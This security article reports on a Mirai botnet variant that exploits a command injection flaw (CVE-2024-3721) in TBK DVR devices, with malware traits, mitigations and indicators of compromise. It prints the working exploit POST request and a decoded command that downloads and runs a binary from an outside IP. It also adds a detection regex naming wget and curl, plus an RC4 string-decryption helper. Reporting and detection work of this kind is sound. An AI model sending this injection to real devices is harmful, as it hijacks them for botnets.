New Mirai Variant Exploits TBK DVR Flaw for Remote Code Execution

The latest wave of Mirai botnet activity has resurfaced with a refined attack chain exploiting CVE-2024-3721, a critical command injection vulnerability in TBK DVR-4104 and DVR-4216 devices.

This campaign leverages unpatched firmware to deploy a modified Mirai variant designed for IoT device hijacking and DDoS operations.

Exploitation Vector & Payload Delivery

Attackers exploit the vulnerability via crafted HTTP POST requests targeting the /device.rsp endpoint.

The injected command downloads and executes an ARM32 binary:

```text
POST /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=cd%20%2Ftmp%3Brm%20arm7%3B%20wget%20http%3A%2F%2F42.112.26.36%2Farm7%3B%20chmod%20777%20%2A%3B%20.%2Farm7%20tbk HTTP/1.1
```

The decoded shell script executes:

```bash
cd /tmp; rm arm7; wget http://42.112.26[.]36/arm7; chmod 777 *; ./arm7 tbk
```

This streamlined payload skips architecture reconnaissance, specifically targeting ARM32-based DVR systems.
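The following Python is an added example (not code from the article or from Kaspersky) that turns the request pattern above into a log check: it parses an HTTP request line, keeps only requests to /device.rsp, percent-decodes the query string, and flags any mdb or mdc value that carries shell metacharacters or a download tool name. Matching happens after decoding because the injection arrives percent-encoded (`%3B` for `;`, `%2F` for `/`). The sample lines are constructed for the demo; the first reproduces the request shown above, the other two are benign. The regex, parameter list and function names are this example's own choices.

```python
"""Flag HTTP request lines that look like command injection against the TBK DVR
/device.rsp endpoint (added example; not the article's or Kaspersky's code)."""
import re
from urllib.parse import parse_qs, urlsplit

# Shell metacharacters and fetch tools that have no business inside mdb/mdc values.
# Pattern is this example's choice; tune it to the traffic you actually see.
SHELL_META = re.compile(r"[;|&`$]|\bwget\b|\bcurl\b|\btftp\b")
WATCHED_PARAMS = ("mdb", "mdc")

# Constructed sample lines: [0] reproduces the request quoted in the article,
# [1] is a benign call to the same endpoint, [2] is an unrelated page fetch.
SAMPLE_REQUESTS = [
    "POST /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos"
    "&mdc=cd%20%2Ftmp%3Brm%20arm7%3B%20wget%20http%3A%2F%2F42.112.26.36%2Farm7"
    "%3B%20chmod%20777%20%2A%3B%20.%2Farm7%20tbk HTTP/1.1",
    "GET /device.rsp?opt=sys&cmd=status&mdb=sos&mdc=ls HTTP/1.1",
    "GET /index.html HTTP/1.1",
]


def parse_request_line(line):
    """Split 'METHOD target HTTP/x.y' into its three parts; None if malformed."""
    parts = line.strip().split()
    if len(parts) != 3 or not parts[2].startswith("HTTP/"):
        return None
    return parts[0], parts[1], parts[2]


def inspect_request(line):
    """Return {'method': ..., 'params': {name: decoded_value}} for a suspicious
    /device.rsp request, or None when the line is clean or not for that path."""
    parsed = parse_request_line(line)
    if parsed is None:
        return None
    method, target, _version = parsed
    url = urlsplit(target)
    if url.path != "/device.rsp":
        return None
    # parse_qs percent-decodes each value, so the metacharacters become visible.
    params = parse_qs(url.query, keep_blank_values=True)
    hits = {}
    for name in WATCHED_PARAMS:
        for value in params.get(name, []):
            if SHELL_META.search(value):
                hits[name] = value
    if not hits:
        return None
    return {"method": method, "params": hits}


def scan_log(lines):
    """Run inspect_request over an iterable of request lines; report 1-based hits."""
    findings = []
    for line_no, line in enumerate(lines, start=1):
        result = inspect_request(line)
        if result is not None:
            findings.append({"line_no": line_no, **result})
    return findings


if __name__ == "__main__":
    for finding in scan_log(SAMPLE_REQUESTS):
        print(f"line {finding['line_no']}: {finding['method']} {finding['params']}")
```

On a real device log the same function can be fed line by line; anything it returns is a request that tried to pass shell syntax through mdb/mdc, which the page's mitigation table says those parameters should never accept.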

Malware Modifications & Evasion Tactics

The Mirai variant incorporates several upgrades:

1. RC4 String Encryption

  • Uses XOR-encrypted RC4 key: 6e7976666525a97639777d2d7f303177
  • Decrypted strings stored in a custom DataDecrypted structure for runtime access

2. Anti-Analysis Checks

  • Scans /proc/[PID]/cmdline for VMware/QEMU indicators
  • Validates its execution path against the hardcoded directories /dev/shm, /tmp and /var/run

3. Process Whitelisting

  • Terminates competing malware processes such as Hajime, Anarchy, and Mozi to monopolize device resources
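For an analyst triaging such a sample, the first task is recovering the encrypted strings. The Python below is an added example, not the article's or Kaspersky's code: a plain RC4 routine plus a helper that decrypts a table of blobs the way the malware rebuilds its DataDecrypted structure at startup. It applies the key quoted above directly; the article says the key is itself XOR-wrapped inside the binary but does not describe that step, so that layer is omitted here (assumption). The blobs are constructed by encrypting known strings so the roundtrip runs offline, and the function names are this example's own.

```python
"""RC4 string-table decryption helper for sample triage (added example; not the
article's or Kaspersky's code)."""

# Key value as quoted in the article. The XOR wrapping the article mentions is
# not described there, so this example assumes the key is used as-is.
KEY_HEX = "6e7976666525a97639777d2d7f303177"
KEY = bytes.fromhex(KEY_HEX)


def rc4(key: bytes, data: bytes) -> bytes:
    """Textbook RC4: key scheduling (KSA) then keystream generation (PRGA).
    Symmetric, so the same call both encrypts and decrypts."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for byte in data:
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(byte ^ s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def decrypt_strings(key: bytes, blobs):
    """Decrypt every blob and return an index -> string table, mirroring the
    decrypted-strings structure a sample builds at runtime. Blobs that do not
    decode as ASCII are returned as hex so a wrong key is visible at a glance."""
    table = {}
    for idx, blob in enumerate(blobs):
        plain = rc4(key, blob)
        try:
            table[idx] = plain.decode("ascii")
        except UnicodeDecodeError:
            table[idx] = plain.hex()
    return table


# Constructed sample: these blobs are NOT from a real sample. They are produced
# here by encrypting strings of the kind the article says the malware hides
# (execution-path checks and competitor process names).
SAMPLE_PLAINTEXTS = ["/dev/shm", "/tmp", "/var/run", "Hajime"]
SAMPLE_BLOBS = [rc4(KEY, text.encode("ascii")) for text in SAMPLE_PLAINTEXTS]


if __name__ == "__main__":
    for idx, text in decrypt_strings(KEY, SAMPLE_BLOBS).items():
        print(f"[{idx}] {text}")
```

When the key you feed in is wrong, the table fills with hex rather than paths and process names, which is the quickest signal that the XOR layer (or whatever wrapping the sample really uses) still has to be undone first.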

Infection Metrics & Mitigation

Telemetry data reveals concentrated infections in China, India, Egypt, Ukraine, Russia, Turkey, and Brazil.

Over 50,000 exposed DVR devices remain vulnerable globally, with attackers actively scanning Shodan-listed targets.

| Mitigation Strategy | Implementation |
| --- | --- |
| Firmware Patching | Apply TBK’s 20240412+ updates |
| Network Segmentation | Isolate DVRs from critical infrastructure |
| Input Sanitization | Block special characters in mdb/mdc parameters |

Kaspersky products detect this variant as HEUR:Backdoor.Linux.Mirai and HEUR:Backdoor.Linux.Gafgyt.

Device owners should prioritize firmware updates and consider factory resets for compromised units.

Indicators of Compromise

```text
IPs: 116.203.104[.]203, 130.61.64[.]122, 161.97.219[.]84
MD5: 011a406e89e603e93640b10325ebbdc8, 24fd043f9175680d0c061b28a2801dfc
```

This campaign underscores the persistent threat of legacy IoT vulnerabilities in industrial surveillance systems.

The Mirai codebase’s continued evolution demonstrates threat actors’ ability to weaponize decade-old malware through strategic modifications.
